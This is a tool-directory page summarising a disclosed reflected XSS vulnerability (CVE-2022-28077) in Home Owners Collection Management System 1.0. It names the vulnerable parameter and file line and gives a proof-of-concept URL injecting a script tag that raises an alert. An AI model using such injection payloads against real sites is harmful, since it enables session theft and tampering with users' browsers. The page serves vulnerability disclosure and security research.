Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/bigzooooz/cve-2022-28077
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubbigzooooz/cve-2022-28077

CVE-2022-28077

Home Owners Collection Management System 1.0 - Reflected XSS

View Repository
114 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-28077

Home Owners Collection Management System 1.0 - Reflected XSS

Exploit Title: Home Owners Collection Management System 1.0 - Reflected XSS

Date: 2022-05-06

CVE: CVE-2022-28077

Exploit Author: Abdulaziz Saad (@b4zb0z)

Vendor Homepage: https://www.sourcecodester.com/

Software Link:

Download Tool
https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html

Version: 1.0

Tested on: LAMP, Ubuntu


[#] Vulnerability Location:

root@kitploit:~
`$_GET['s']` in `/hocms/admin/inc/navigation.php:117`

[#] Exploitation:

root@kitploit:~
`http://localhost/hocms/admin/?s=<script>alert('b4zb0z')</script>`